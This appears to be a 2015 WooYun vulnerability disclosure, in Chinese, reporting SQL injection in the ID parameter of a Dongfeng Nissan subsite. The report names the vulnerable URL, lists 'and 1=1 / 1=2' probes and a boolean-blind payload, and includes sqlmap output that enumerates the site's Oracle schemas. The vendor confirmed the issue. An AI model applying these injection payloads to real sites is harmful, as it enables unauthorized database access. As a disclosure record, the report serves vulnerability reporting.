当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132529

漏洞标题:东风日产分站注入一枚

相关厂商:东风日产乘用车公司

漏洞作者: MT哥

提交时间:2015-08-09 00:18

修复时间:2015-09-23 00:56

公开时间:2015-09-23 00:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-09: 细节已通知厂商并且等待厂商处理中
2015-08-09: 厂商已经确认,细节仅向厂商公开
2015-08-19: 细节向核心白帽子及相关领域专家公开
2015-08-29: 细节向普通白帽子公开
2015-09-08: 细节向实习白帽子公开
2015-09-23: 细节向公众公开

简要描述:

听说厂家很活跃

详细说明:

http://www.dfmg.com.cn/EN/NewsDetail.aspx?ID=3238


and 1=1 1=2 简单判断

漏洞证明:

[22:28:35] [INFO] resuming back-end DBMS 'oracle' 
[22:28:36] [INFO] testing connection to the target URL
[22:28:39] [WARNING] reflective value(s) found and filtering out
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=3238 AND 4837=4837
---
[22:28:39] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
[22:28:39] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[22:28:39] [INFO] fetching database (schema) names
[22:28:39] [INFO] fetching number of databases
[22:28:39] [INFO] resumed: 16
[22:28:39] [INFO] retrieving the length of query output
[22:28:39] [INFO] retrieved: 6
[22:28:47] [INFO] resumed: CTXSYS
[22:28:47] [INFO] retrieving the length of query output
[22:28:47] [INFO] retrieved: 4
[22:28:59] [INFO] resumed: JBPM
[22:28:59] [INFO] retrieving the length of query output
[22:28:59] [INFO] retrieved: 5
[22:29:12] [INFO] resuming partial value: M
[22:29:52] [INFO] retrieved: MDSYS
[22:29:52] [INFO] retrieving the length of query output
[22:29:52] [INFO] retrieved: 3
[22:30:32] [INFO] retrieved: ODM
[22:30:32] [INFO] retrieving the length of query output
[22:30:32] [INFO] retrieved: 7
[22:31:32] [INFO] retrieved: ODM_MTR
[22:31:32] [INFO] retrieving the length of query output
[22:31:32] [INFO] retrieved: 7
[22:32:35] [INFO] retrieved: OLAPSY@
[22:32:35] [INFO] retrieving the length of query output
[22:32:35] [INFO] retrieved: 6
[22:33:41] [INFO] retrieved: ORDSYS
[22:33:41] [INFO] retrieving the length of query output
[22:33:41] [INFO] retrieved: 5
[22:34:34] [INFO] retrieved: OUTLN
[22:34:34] [INFO] retrieving the length of query output
[22:34:34] [INFO] retrieved: 8
[22:35:45] [INFO] retrieved: PERFSTAT
[22:35:45] [INFO] retrieving the length of query output
[22:35:45] [INFO] retrieved: 4
[22:36:28] [INFO] retrieved: RMAN
[22:36:28] [INFO] retrieving the length of query output
[22:36:28] [INFO] retrieved: 5
[22:37:22] [INFO] retrieved: SCOTT
[22:37:22] [INFO] retrieving the length of query output
[22:37:22] [INFO] retrieved: 3
[22:37:57] [INFO] retrieved: SYS
[22:37:57] [INFO] retrieving the length of query output
[22:37:57] [INFO] retrieved: 6
[22:38:56] [INFO] retrieved: SYSTEM
[22:38:56] [INFO] retrieving the length of query output
[22:38:56] [INFO] retrieved: 5
[22:39:48] [INFO] retrieved: WKSYS
[22:39:48] [INFO] retrieving the length of query output
[22:39:48] [INFO] retrieved: 5
[22:40:35] [INFO] retrieved: WMSYS
[22:40:35] [INFO] retrieving the length of query output
[22:40:35] [INFO] retrieved: 3
[22:41:19] [INFO] retrieved: XDB
available databases [16]:
[*] CTXSYS
[*] JBPM
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OLAPSY@
[*] ORDSYS
[*] OUTLN
[*] PERFSTAT
[*] RMAN
[*] SCOTT
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB

修复方案:

waf+过滤

版权声明:转载请注明来源 MT哥@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-08-09 00:54

厂商回复:

感谢提醒!

最新状态:

暂无